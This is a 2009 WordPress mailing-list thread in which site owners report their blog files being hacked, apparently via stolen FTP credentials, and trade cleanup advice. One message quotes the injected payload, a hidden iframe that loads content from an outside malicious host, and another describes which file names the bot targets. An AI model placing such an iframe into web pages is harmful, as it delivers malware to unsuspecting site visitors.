Thankfully I've only gone in using FTP on 2 of them within the
last 2 months so I (and they) should be okay. Still, I'll have
to check the files on each of those 2 if not re-upgrade 2.8.2
altogether just to be safe.
Such is life in the online world.
On 07/23/2009 06:22 PM, Chris Carter wrote:
you might be in trouble...
On Thu, Jul 23, 2009 at 5:08 PM, Kirk M<kmb4...@gmail.com> wrote:
Clean here so far (2.8.2). Guess I'll be working from Ubuntu to service my
sites for awhile rather than Windows at least until I get everything changed
around and my Windows parition fully scanned. I have several FTP accounts
configured, many are for other site owners who ask me to maintain their WP
powered sites. It definitely wouldn't do to have those get hacked.
On 07/23/2009 05:50 PM, Chris Carter wrote:
Change your pwds and scan away.. I used cpanel file manager for a while
to
make sure they stopped attacking .. looking at logs, it hits and is tagged
with googlebot, but the IP's are strange
Anyway, This virus looks for files with:
index*.*
default*.*
main*.*
home*.*
(I built a static php includes site, and only files named like the above
were affected)
Also might want to check your CGI-BIN for files that look suspicious
It's basically is a bot that logs in, finds any files in all directories
that start with the above
...funny thing was that somtimes where they inject it, PHP code throws
errors. They need to revise their bot to work outside the<? tags :)
-Chris
314media.com
On Thu, Jul 23, 2009 at 4:19 PM, Navjot Singh<navjotjsi...@gmail.com
wrote:
Yeah..my Wordpress mu install also got hacked. Just confirmed.
On Fri, Jul 24, 2009 at 2:48 AM, dinu<he...@offlineblog.net> wrote:
I had to restore from backup. the entire blog
when I first saw Default.widgets.php hacked, I tried restoring only that
page. But then I found hidden iframe codes on all of my pages (
including
pages after login )
when I contacted Dreamhost support, they said it was an ftp hack. So, I
would think its not a wordpress issue.
On Fri, Jul 24, 2009 at 2:35 AM, Navjot Singh<navjotjsi...@gmail.com
wrote:
2.8.1 at the time of being hacked. Just upgraded to 2.8.2
On Fri, Jul 24, 2009 at 2:31 AM, Joshua
Dunbar<josh2...@findingjesustoday.com> wrote:
What version of wordpress are you running?
--------------------------------------------------
From: "Chris Carter"<carter.ch...@gmail.com>
Sent: Thursday, July 23, 2009 3:43 PM
To:<wp-testers@lists.automattic.com>
Cc:<wp-testers@lists.automattic.com>;<
wp-hack...@lists.automattic.com>
Subject: Re: [wp-testers] Default.widgets.php Hacked? What to do?
I keep getting hacked with that code inserted into
admin/default-filters
Chris Carter
President
314media.com
314-714-5448
On Jul 23, 2009, at 3:31 PM, Navjot Singh<navjotjsi...@gmail.com>
wrote:
I have a blog running on 2.8.2 and suddenly now I find all index.php
and wp-includes/Default.widgets.php hacked with following code
inserted randomly :
<iframe src="http://u1j.in:8080/ts/in.cgi?pepsi109"; width=125
height=125 style="visibility: hidden"></iframe>
How to prevent further hacking? I am currently replacing all the
files
affected since all of them affected at a certain date. I am on a
shared hosting and only one blog got attacked.
_______________________________________________
wp-testers mailing list
wp-testers@lists.automattic.com
http://lists.automattic.com/mailman/listinfo/wp-testers
